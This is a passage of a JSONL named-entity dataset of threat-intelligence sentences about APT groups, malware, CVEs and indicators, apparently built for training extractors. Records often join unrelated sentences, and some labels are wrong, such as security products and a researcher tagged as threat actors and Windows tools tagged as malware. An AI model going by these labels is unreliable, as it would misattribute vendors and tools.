Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker ’s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": {"THREAT_ACTOR: Winnti": [[163, 169]], "FILEPATH: hpqhvsei.dll": [[172, 184]], "THREAT_ACTOR: threat researcher": [[206, 223]], "VULNERABILITY: discovered an attacker ’s tooling via an open repository , downloaded all of the tools": [[247, 333]]}, "info": {"id": "cyberner_stix_train_007177", "source": "cyberner_stix_train"}} {"text": "The database contained the last activity performed on around 60 compromised devices . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy Email Stealer” part of their arsenal . According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries .", "spans": {"THREAT_ACTOR: TA505": [[90, 95]], "ORGANIZATION: Banking": [[195, 202]], "ORGANIZATION: Retail": [[207, 213]], "THREAT_ACTOR: HIDDEN COBRA actors": [[373, 392]], "MALWARE: FALLCHILL": [[416, 425]], "MALWARE: malware": [[426, 433]], "ORGANIZATION: aerospace": [[459, 468]], "ORGANIZATION: telecommunications": [[471, 489]], "ORGANIZATION: finance industries": [[496, 514]]}, "info": {"id": "cyberner_stix_train_007178", "source": "cyberner_stix_train"}} {"text": "One ELF library , libloc4d.so , handles amongst other things the loading of the app-decoded ELF library file “ sux ” , as well as handling connectivity to the C2 . In May 2016 , APT41 deployed a POISONPLUG sample at a U.S.-based game development studio . 
The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": {"THREAT_ACTOR: APT41": [[178, 183]], "MALWARE: JHUHUGIT": [[259, 267]], "TOOL: Java": [[365, 369]], "VULNERABILITY: zero-day": [[370, 378]], "VULNERABILITY: CVE-2015-2590": [[381, 394]]}, "info": {"id": "cyberner_stix_train_007179", "source": "cyberner_stix_train"}} {"text": "Some of these same tools , identified by hash , were evaluated in a malware testing environment by a single user .", "spans": {}, "info": {"id": "cyberner_stix_train_007180", "source": "cyberner_stix_train"}} {"text": "This payload is also used by the earlier versions of the implant . Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected . Winnti Group : Blackfly .", "spans": {"ORGANIZATION: Cisco Talos": [[67, 78]], "THREAT_ACTOR: Winnti Group": [[199, 211]], "THREAT_ACTOR: Blackfly": [[214, 222]]}, "info": {"id": "cyberner_stix_train_007181", "source": "cyberner_stix_train"}} {"text": "The user may not notice the Flash object on the page , as Word displays it as a tiny black box in the document , as seen in Figure 1 .", "spans": {"TOOL: Flash": [[28, 33]], "TOOL: Word": [[58, 62]]}, "info": {"id": "cyberner_stix_train_007182", "source": "cyberner_stix_train"}} {"text": "BrainTest uses four privilege escalation exploits to gain root access on a device and to install a persistent malware as a system application . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . 
The tactical malware , historically EvilGrab , and now ChChes ( and likely also RedLeaves ) , is designed to be lightweight and disposable , often being delivered through spear phishing .", "spans": {"MALWARE: BrainTest": [[0, 9]], "VULNERABILITY: privilege escalation exploits": [[20, 49]], "TOOL: PIVY": [[144, 148], [410, 414]], "ORGANIZATION: chemical makers": [[222, 237]], "ORGANIZATION: government agencies": [[240, 259]], "ORGANIZATION: defense contractors": [[262, 281]], "THREAT_ACTOR: attackers": [[352, 361]], "VULNERABILITY: zero-day vulnerability": [[369, 391]], "MALWARE: EvilGrab": [[461, 469]], "MALWARE: ChChes": [[480, 486]], "MALWARE: RedLeaves": [[505, 514]]}, "info": {"id": "cyberner_stix_train_007183", "source": "cyberner_stix_train"}} {"text": "Because the real nature of apps containing adware is usually hidden to the user , these apps and their developers should be considered untrustworthy . There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet . Bankshot was first reported by the Department of Homeland Security on December 13 , 2017 , and has only recently resurfaced in newly compiled variants .", "spans": {"MALWARE: winword.exe": [[237, 248]], "MALWARE: Start-Process": [[267, 280]], "MALWARE: cmdlet": [[281, 287]], "MALWARE: Bankshot": [[290, 298]], "ORGANIZATION: Department of Homeland Security": [[325, 356]]}, "info": {"id": "cyberner_stix_train_007184", "source": "cyberner_stix_train"}} {"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . 
This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"MALWARE: documents": [[4, 13]], "VULNERABILITY: CVE-2012-0158": [[97, 110]], "VULNERABILITY: Microsoft Word vulnerabilities": [[166, 196]], "TOOL: emails": [[307, 313]], "FILEPATH: Microsoft Word attachment": [[321, 346]], "VULNERABILITY: CVE-2017-0199": [[379, 392]], "MALWARE: ZeroT Trojan": [[407, 419]], "MALWARE: PlugX Remote Access Trojan": [[451, 477]], "MALWARE: RAT": [[480, 483]]}, "info": {"id": "cyberner_stix_train_007185", "source": "cyberner_stix_train"}} {"text": "] today www [ . Given the wide usage of STAR in LATAM , financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group . This sample ( aa873ed803ca800ce92a39d9a683c644 ) exhibited network traffic that does not match the earlier pattern and therefore may evade existing network traffic signatures designed to detect Ixeshe related infections . 
The web shell , named help.aspx ( MD5 : 4b3039cf227c611c45d2242d1228a121 ) , contained code to identify the presence of ( 1 ) FireEye xAgent , ( 2 ) CarbonBlack , or ( 3 ) CrowdStrike Falcon endpoint products and write the output of discovery .", "spans": {"ORGANIZATION: financial institutions": [[56, 78]], "THREAT_ACTOR: MoneyTaker group": [[152, 168]], "FILEPATH: aa873ed803ca800ce92a39d9a683c644": [[185, 217]], "MALWARE: Ixeshe": [[365, 371]], "THREAT_ACTOR: FireEye xAgent": [[519, 533]], "THREAT_ACTOR: CarbonBlack": [[542, 553]], "THREAT_ACTOR: CrowdStrike Falcon": [[565, 583]]}, "info": {"id": "cyberner_stix_train_007186", "source": "cyberner_stix_train"}} {"text": "It should be noted that CosmicDuke does not interoperate with the second , embedded malware in any way other than by writing the malware to disk and executing it .", "spans": {"MALWARE: CosmicDuke": [[24, 34]]}, "info": {"id": "cyberner_stix_train_007187", "source": "cyberner_stix_train"}} {"text": "C2 and Targeted Banks As described earlier , the C2 domain is kept in the app ’ s resources . We consider APT38 's operations more global and highly specialized for targeting the financial sector . For example , The code hunted for several security products to evade – including Kaspersky .", "spans": {"THREAT_ACTOR: APT38": [[106, 111]], "ORGANIZATION: financial sector": [[179, 195]], "ORGANIZATION: security products": [[240, 257]], "ORGANIZATION: Kaspersky": [[279, 288]]}, "info": {"id": "cyberner_stix_train_007188", "source": "cyberner_stix_train"}} {"text": "DualToy is still active and we have detected over 8,000 unique samples belonging to this Trojan family to date . Indeed , we have detected various external tools being abused by Okrum , such as a keylogger , tools for dumping passwords , or enumerating network sessions . 
North Korean group definitions are known to have significant overlap , and the name Lazarus Group is known to encompass a broad range of activity .", "spans": {"MALWARE: DualToy": [[0, 7]], "THREAT_ACTOR: Okrum": [[178, 183]], "TOOL: keylogger": [[196, 205]], "TOOL: tools": [[208, 213]], "TOOL: enumerating network sessions": [[241, 269]], "THREAT_ACTOR: Lazarus Group": [[356, 369]]}, "info": {"id": "cyberner_stix_train_007189", "source": "cyberner_stix_train"}} {"text": "The WICKED PANDA adversary makes use of a number of open-source and custom tools to infect and move laterally in victim networks . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"THREAT_ACTOR: WICKED PANDA": [[4, 16]], "TOOL: custom tools": [[68, 80]], "THREAT_ACTOR: Sofacy group": [[135, 147]], "TOOL: Flash": [[191, 196]], "VULNERABILITY: exploits": [[197, 205]], "MALWARE: Carberp": [[223, 230]], "MALWARE: JHUHUGIT downloaders": [[237, 257]]}, "info": {"id": "cyberner_stix_train_007190", "source": "cyberner_stix_train"}} {"text": "CTU researchers and Secureworks incident responders have observed BRONZE PRESIDENT using the following tools , along with several custom batch scripts for locating and archiving specific file types :", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: BRONZE PRESIDENT": [[66, 82]]}, "info": {"id": "cyberner_stix_train_007191", "source": "cyberner_stix_train"}} {"text": "The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . 
Buhtrap has been active since 2014 , however their first attacks against financial institutions were only detected in August 2015 .", "spans": {"MALWARE: cmd.exe": [[80, 87]], "THREAT_ACTOR: Buhtrap": [[206, 213]], "ORGANIZATION: financial institutions": [[279, 301]]}, "info": {"id": "cyberner_stix_train_007192", "source": "cyberner_stix_train"}} {"text": "In April 2015 , we uncovered the malicious efforts of APT30 , a suspected China-based threat group that has exploited the networks of governments and organizations across the region , targeting highly sensitive political , economic and military information . In addition to spreading malware via spear fishing email with Office attachment containing either vulnerability or malicious macro , this group is particularly good at leveraging malicious Android APKs in the target attacks .", "spans": {"THREAT_ACTOR: APT30": [[54, 59]], "ORGANIZATION: governments": [[134, 145]], "ORGANIZATION: organizations": [[150, 163]], "ORGANIZATION: sensitive political": [[201, 220]], "ORGANIZATION: economic": [[223, 231]], "ORGANIZATION: military": [[236, 244]], "MALWARE: Android APKs": [[448, 460]]}, "info": {"id": "cyberner_stix_train_007193", "source": "cyberner_stix_train"}} {"text": "Proofpoint researchers track a wide range of threat actors involved in both financially motivated cybercrime and state-sponsored actions .", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]]}, "info": {"id": "cyberner_stix_train_007194", "source": "cyberner_stix_train"}} {"text": "Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . 
Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective .", "spans": {"MALWARE: TajMahal": [[37, 45]], "THREAT_ACTOR: Confucius": [[151, 160]], "THREAT_ACTOR: Patchwork": [[165, 174]]}, "info": {"id": "cyberner_stix_train_007195", "source": "cyberner_stix_train"}} {"text": "If the package name of the foreground app is included in the target list , an overlay is shown . Recorded Future has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . According to the debug path in the body , the author of the tool called it “ NamelessHdoor , ” and its internal version is identified as “ V1.5. ”", "spans": {"ORGANIZATION: Recorded Future": [[97, 112]], "THREAT_ACTOR: APT10": [[134, 139]], "MALWARE: NamelessHdoor": [[387, 400]]}, "info": {"id": "cyberner_stix_train_007196", "source": "cyberner_stix_train"}} {"text": "looks like it was created for manual operator control . Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries . APT33 : 95.211.191.117 update-sec.com . 
We have observed some lower degrees of confidence overlaps in post - exploitation stages among these UNC groups , like using the same recon commands and utilities available on Windows .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[78, 97]], "TOOL: Volgmer malware": [[123, 138]], "ORGANIZATION: government": [[165, 175]], "ORGANIZATION: financial": [[178, 187]], "ORGANIZATION: automotive": [[190, 200]], "ORGANIZATION: media industries": [[207, 223]], "THREAT_ACTOR: APT33": [[226, 231]], "IP_ADDRESS: 95.211.191.117": [[234, 248]], "DOMAIN: update-sec.com": [[249, 263]]}, "info": {"id": "cyberner_stix_train_007197", "source": "cyberner_stix_train"}} {"text": "Downeks can be instructed by the C2 to perform a few other commands :", "spans": {"MALWARE: Downeks": [[0, 7]], "TOOL: C2": [[33, 35]]}, "info": {"id": "cyberner_stix_train_007198", "source": "cyberner_stix_train"}} {"text": "Once the keyword is present , the SDK will switch from innocent ads server to malicious payload delivery ones . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems , as well as credit card data received from popular online travel agencies ( OTAs ) such as Booking.com . The final payloads include the AgentTesla remote access trojan ( RAT ) , Cobalt Strike beacons and njRAT .", "spans": {"TOOL: sctrls backdoor": [[116, 131]], "VULNERABILITY: CVE-2015-1641": [[185, 198]], "ORGANIZATION: online travel agencies": [[359, 381]], "ORGANIZATION: OTAs": [[384, 388]], "DOMAIN: Booking.com": [[399, 410]], "MALWARE: AgentTesla remote access trojan ( RAT": [[444, 481]], "TOOL: Cobalt Strike": [[486, 499]], "TOOL: njRAT": [[512, 517]]}, "info": {"id": "cyberner_stix_train_007199", "source": "cyberner_stix_train"}} {"text": "] top/7 * * * * * 3 ” ( Fr . APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper . 
The developer used the Microsoft Winsocks API to handle the network connection .", "spans": {"THREAT_ACTOR: APT33": [[29, 34]], "ORGANIZATION: Kaspersky": [[58, 67]], "TOOL: DROPSHOT dropper": [[89, 105]], "TOOL: Microsoft Winsocks API": [[131, 153]]}, "info": {"id": "cyberner_stix_train_007200", "source": "cyberner_stix_train"}} {"text": "Figure 7 . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Once decoded , decrypted , and executed , an obfuscated loader will load one of the APT32 backdoors . They also added a new user for persistence and used the Wput tool to exfiltrate the victims files to their own FTP server .", "spans": {"TOOL: DropIt sample": [[39, 52]], "MALWARE: %TEMP%\\flash_update.exe": [[190, 213]], "TOOL: Flash Player installer": [[238, 260]], "THREAT_ACTOR: APT32": [[347, 352]], "TOOL: Wput": [[421, 425]]}, "info": {"id": "cyberner_stix_train_007201", "source": "cyberner_stix_train"}} {"text": "That is why Microsoft has been working to extend its industry-leading endpoint protection capabilities beyond Windows . Starting in mid-February , Unit 42 researchers have been tracking an active campaign sharing a significant portion of infrastructure leveraged by Gorgon Group for criminal and targeted attacks . The modified code will consider this . 
Kaspersky ’s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]], "SYSTEM: Windows": [[110, 117]], "ORGANIZATION: Unit 42": [[147, 154]], "THREAT_ACTOR: Gorgon Group": [[266, 278]], "ORGANIZATION: Kaspersky ’s Global Research and Analysis Team ( GReAT )": [[354, 410]]}, "info": {"id": "cyberner_stix_train_007202", "source": "cyberner_stix_train"}} {"text": "'' Strazzere 's experience in trying to contact both vendors last year is typical of the frustrations frequently faced by security researchers . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . Custom Gh0st : 8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40 .", "spans": {"MALWARE: RTF files": [[197, 206]], "VULNERABILITY: CVE-2018-0798": [[227, 240]], "MALWARE: Custom Gh0st": [[299, 311]], "FILEPATH: 8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40": [[314, 378]]}, "info": {"id": "cyberner_stix_train_007203", "source": "cyberner_stix_train"}} {"text": "Several Mandiant investigations revealed that , after gaining access , APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon’s Invoke-Obfuscation framework . 
Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China .", "spans": {"ORGANIZATION: Mandiant": [[8, 16]], "THREAT_ACTOR: APT32": [[71, 76]], "TOOL: PowerShell-based tools": [[149, 171]], "ORGANIZATION: Unit 42": [[318, 325]], "THREAT_ACTOR: groups": [[410, 416]], "ORGANIZATION: minority groups": [[471, 486]]}, "info": {"id": "cyberner_stix_train_007204", "source": "cyberner_stix_train"}} {"text": "One theory is that the botnets were a criminal side business for the Dukes group .", "spans": {"THREAT_ACTOR: Dukes": [[69, 74]]}, "info": {"id": "cyberner_stix_train_007205", "source": "cyberner_stix_train"}} {"text": "The researchers say the malware uses the unusually tight control it gains over infected devices to create windfall profits and steadily increase its numbers . The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America . APT33 : 8.26.21.117 srvhost.servehttp.com . \" Indicators of attack IoAs refer to the series of behaviors that a cybercriminal exhibits prior to executing a cyberattack .", "spans": {"THREAT_ACTOR: cybercriminal group": [[163, 182]], "THREAT_ACTOR: Lazarus": [[183, 190]], "ORGANIZATION: financial organizations": [[218, 241]], "THREAT_ACTOR: APT33": [[270, 275]], "IP_ADDRESS: 8.26.21.117": [[278, 289]], "DOMAIN: srvhost.servehttp.com": [[290, 311]]}, "info": {"id": "cyberner_stix_train_007206", "source": "cyberner_stix_train"}} {"text": "PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests . 
Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[0, 12]], "FILEPATH: BalkanRAT": [[166, 175]], "FILEPATH: BalkanDoor": [[180, 190]]}, "info": {"id": "cyberner_stix_train_007207", "source": "cyberner_stix_train"}} {"text": "This entry was posted on Fri Mar 16 00:00 EDT 2018 and filed under Targeted Attacks , FireEye , and China . From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August .", "spans": {"ORGANIZATION: FireEye": [[86, 93]], "FILEPATH: Locky": [[151, 156]], "TOOL: email": [[208, 213]]}, "info": {"id": "cyberner_stix_train_007208", "source": "cyberner_stix_train"}} {"text": "For example , Trojan.Shunnael ( aka X-Tunnel ) , malware used to maintain access to infected networks using an encrypted tunnel , underwent a rewrite to .NET .", "spans": {"FILEPATH: Trojan.Shunnael": [[14, 29]], "MALWARE: X-Tunnel": [[36, 44]], "TOOL: .NET": [[153, 157]]}, "info": {"id": "cyberner_stix_train_007210", "source": "cyberner_stix_train"}} {"text": "This ' connection bouncer ' tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic . 
The computers of diplomats , military attachés , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) .", "spans": {"TOOL: connection bouncer": [[7, 25]], "THREAT_ACTOR: threat actor": [[42, 54]], "ORGANIZATION: diplomats": [[164, 173]], "ORGANIZATION: military attachés": [[176, 193]], "ORGANIZATION: private assistants": [[196, 214]], "ORGANIZATION: secretaries": [[217, 228]], "ORGANIZATION: Prime Ministers": [[232, 247]], "ORGANIZATION: journalists": [[250, 261]]}, "info": {"id": "cyberner_stix_train_007211", "source": "cyberner_stix_train"}} {"text": "The group has performed these activities at multiple locations across Brazil , possibly using multiple mules . Turla is a notorious group that has been targeting government officials .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: Turla": [[111, 116]], "ORGANIZATION: government officials": [[162, 182]]}, "info": {"id": "cyberner_stix_train_007212", "source": "cyberner_stix_train"}} {"text": "The malicious application is on the left-hand side . We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information . APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored .", "spans": {"THREAT_ACTOR: BITTER APT": [[70, 80]], "ORGANIZATION: government": [[106, 116]], "THREAT_ACTOR: APT33": [[248, 253]], "ORGANIZATION: aerospace": [[296, 305]], "ORGANIZATION: energy": [[310, 316]]}, "info": {"id": "cyberner_stix_train_007213", "source": "cyberner_stix_train"}} {"text": "Finished ! Had more ccTLDs implemented security features such as registrar locks , attackers would be unable to redirect the targeted domains . 
APT38 APT38 is a financially-motivated threat group that is backed by the North Korean regime .", "spans": {"THREAT_ACTOR: attackers": [[83, 92]], "THREAT_ACTOR: APT38": [[144, 149], [150, 155]]}, "info": {"id": "cyberner_stix_train_007214", "source": "cyberner_stix_train"}} {"text": "The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies . Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China .", "spans": {"ORGANIZATION: telecommunications companies": [[144, 172]], "THREAT_ACTOR: TG-3390": [[187, 194]], "ORGANIZATION: CTU": [[237, 240]], "ORGANIZATION: People's Republic": [[316, 333]]}, "info": {"id": "cyberner_stix_train_007215", "source": "cyberner_stix_train"}} {"text": "MD5 b84b66bcdecd4b4529014619ed649d76 SHA1 fef1725ad72e4ef0432f8cb0cb73bf7ead339a7c Algorithm sha1 With RSA Encryption .", "spans": {"FILEPATH: b84b66bcdecd4b4529014619ed649d76": [[4, 36]], "FILEPATH: fef1725ad72e4ef0432f8cb0cb73bf7ead339a7c": [[42, 82]]}, "info": {"id": "cyberner_stix_train_007216", "source": "cyberner_stix_train"}} {"text": "It will use either a standard web request or it will write data into a web socket if the first method fails . A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor . 
However , we assess with medium confidence that NavRAT is linked to Group123 .", "spans": {"THREAT_ACTOR: ITG08": [[143, 148]], "TOOL: More_eggs JScript backdoor": [[172, 198]], "MALWARE: NavRAT": [[249, 255]], "THREAT_ACTOR: Group123": [[269, 277]]}, "info": {"id": "cyberner_stix_train_007217", "source": "cyberner_stix_train"}} {"text": "The dates were all fairly recent , having been received in the past few days since the beginning of August .", "spans": {}, "info": {"id": "cyberner_stix_train_007218", "source": "cyberner_stix_train"}} {"text": "All 3 samples were compiled with the same timestamp .", "spans": {}, "info": {"id": "cyberner_stix_train_007219", "source": "cyberner_stix_train"}} {"text": "Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Leafminer": [[35, 44]], "VULNERABILITY: Heartbleed vulnerability": [[61, 85]], "VULNERABILITY: CVE-2014-0160": [[88, 101]], "ORGANIZATION: embassies": [[222, 231]]}, "info": {"id": "cyberner_stix_train_007220", "source": "cyberner_stix_train"}} {"text": "A Russian security firm 'Doctor Web ' identified the first mass distributed Android bootkit malware called 'Android.Oldboot ' , a piece of malware that 's designed to re-infect devices after reboot , even if you delete all working components of it . Some time ago , a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown , undetected malware . We believe that APT1 is able to wage such a long-running and extensive cyber espionage campaign in large part because it receives direct government support . 
The exploits are located in separate web pages .", "spans": {"ORGANIZATION: Web": [[32, 35]], "SYSTEM: Android": [[76, 83]], "ORGANIZATION: Kaspersky Lab": [[268, 281]], "THREAT_ACTOR: APT1": [[443, 447]]}, "info": {"id": "cyberner_stix_train_007221", "source": "cyberner_stix_train"}} {"text": "Once the backdoor sends basic information about its newly compromised system , the operators take control of the backdoor and start to send commands right away .", "spans": {}, "info": {"id": "cyberner_stix_train_007222", "source": "cyberner_stix_train"}} {"text": "Patterning such as reuse of WHOIS artifacts , IP reuse , or even domain name themes are common and regularly used to group attacks to specific campaigns .", "spans": {"TOOL: WHOIS": [[28, 33]]}, "info": {"id": "cyberner_stix_train_007223", "source": "cyberner_stix_train"}} {"text": "It prompts the user to download a file that supposedly contains the full article .", "spans": {}, "info": {"id": "cyberner_stix_train_007224", "source": "cyberner_stix_train"}} {"text": "Corrupted archive privapp.txt Looks like a list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently . DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity . APT33 : 8.26.21.120 mynetwork.ddns.net . 
The ThreatConnect Platform centralizes threat intelligence , automates key activities and enables information sharing across the internal security organization and with external partners .", "spans": {"ORGANIZATION: DHS": [[317, 320]], "ORGANIZATION: FBI": [[325, 328]], "THREAT_ACTOR: APT33": [[455, 460]], "IP_ADDRESS: 8.26.21.120": [[463, 474]], "DOMAIN: mynetwork.ddns.net": [[475, 493]], "TOOL: ThreatConnect Platform": [[500, 522]]}, "info": {"id": "cyberner_stix_train_007225", "source": "cyberner_stix_train"}} {"text": "While we became initially curious because the hacktool was signed , we became more suspicious when we realized a mobile software developer had signed it , since this is not the type of software typically associated with a mobile application .", "spans": {}, "info": {"id": "cyberner_stix_train_007226", "source": "cyberner_stix_train"}} {"text": "Quasar mutex name : VMFvdCsC7RFqerZinfV0sxJFo .", "spans": {"MALWARE: Quasar": [[0, 6]], "FILEPATH: VMFvdCsC7RFqerZinfV0sxJFo": [[20, 45]]}, "info": {"id": "cyberner_stix_train_007227", "source": "cyberner_stix_train"}} {"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . 
this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": {"VULNERABILITY: CVE-2017-1099": [[71, 84]], "MALWARE: RTF attachments": [[100, 115]], "TOOL: RTF": [[132, 135]], "VULNERABILITY: CVE-2017-1882": [[155, 168]], "FILEPATH: eqnedt32.exe": [[172, 184]]}, "info": {"id": "cyberner_stix_train_007228", "source": "cyberner_stix_train"}} {"text": "C2 server : app.progsupdate.com , which resolved to 185.141.25.68 ) , over port 4664 .", "spans": {"TOOL: C2": [[0, 2]], "DOMAIN: app.progsupdate.com": [[12, 31]], "IP_ADDRESS: 185.141.25.68": [[52, 65]]}, "info": {"id": "cyberner_stix_train_007229", "source": "cyberner_stix_train"}} {"text": "We recently observed a resurgence of the same phishing campaign when our systems detected roughly 90 phony Apple-like domains that were registered from July 2016 to September 2016 . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": {"ORGANIZATION: individual": [[204, 214]], "THREAT_ACTOR: actors": [[228, 234]]}, "info": {"id": "cyberner_stix_train_007230", "source": "cyberner_stix_train"}} {"text": "The Spark backdoor allows the attackers to :", "spans": {"MALWARE: Spark backdoor": [[4, 18]]}, "info": {"id": "cyberner_stix_train_007231", "source": "cyberner_stix_train"}} {"text": "This exploit delivers a malware variant that shares characteristics with the APT28 backdoors CHOPSTICK and CORESHELL malware families , both described in our APT28 whitepaper .", "spans": {"THREAT_ACTOR: APT28": [[77, 82], [158, 163]], "MALWARE: CHOPSTICK": [[93, 102]], "MALWARE: CORESHELL": [[107, 116]]}, "info": {"id": "cyberner_stix_train_007233", "source": "cyberner_stix_train"}} {"text": "Using our Farsight DNSDB integration , we identified other domains currently and previously hosted on the same IP .", "spans": {"ORGANIZATION: Farsight": [[10, 18]], "TOOL: DNSDB": [[19, 24]]}, "info": 
{"id": "cyberner_stix_train_007234", "source": "cyberner_stix_train"}} {"text": "In doing so , users can become victims to malicious apps portraying themselves as the original app . Although both examples of the different delivery methods described above show an exclusive targeting of Russian speakers , the recurring financial and political themes that they use highlight the attacker's interest in the financial world once more . When executed , it will register symbols for multiple commonly used functions , including : open() , rmdir() , and unlink() , and modify their returns to hide the malware ’s operations .", "spans": {"THREAT_ACTOR: attacker's": [[297, 307]], "ORGANIZATION: financial": [[324, 333]], "TOOL: open()": [[444, 450]], "TOOL: rmdir()": [[453, 460]], "TOOL: unlink()": [[467, 475]]}, "info": {"id": "cyberner_stix_train_007235", "source": "cyberner_stix_train"}} {"text": "Below is a table with the compile date and some PDB strings found within a few of the binaries .", "spans": {}, "info": {"id": "cyberner_stix_train_007236", "source": "cyberner_stix_train"}} {"text": "For example , Svpeng uses a previously unknown vulnerability to protect itself from being removed manually or by the antivirus program . The group used a number of tools common to other Chinese hacking groups , but they had a few unique tools of their own with interfaces developed for Standard ( Simplified ) Chinese . The decrypted payload is the usual shellcode responsible for ShadowPad initialization ( obfuscated using fake conditional jumps to hinder disassembly ) . 
The threat of Iranian cyber operations continues to rise as challenges in relation to the renewal of the 2015 Iranian Nuclear Deal persist and regional tensions , specifically between Israel and Iran , escalate .", "spans": {"MALWARE: Svpeng": [[14, 20]], "TOOL: shellcode": [[355, 364]], "MALWARE: ShadowPad": [[381, 390]], "THREAT_ACTOR: Iranian cyber operations": [[488, 512]], "ORGANIZATION: Iranian Nuclear Deal": [[584, 604]], "ORGANIZATION: Israel": [[658, 664]], "ORGANIZATION: Iran": [[669, 673]]}, "info": {"id": "cyberner_stix_train_007237", "source": "cyberner_stix_train"}} {"text": "They took advantage of the Syrian military conflict for thematic content and file naming “ Trump ’s_Attack_on_Syria_English.docx ” .", "spans": {"FILEPATH: Trump ’s_Attack_on_Syria_English.docx": [[91, 128]]}, "info": {"id": "cyberner_stix_train_007238", "source": "cyberner_stix_train"}} {"text": "However , Poseidon 's practice of being a ' custom-tailored malware implants boutique ' kept security researchers from connecting different campaigns under the umbrella of a single threat actor . 
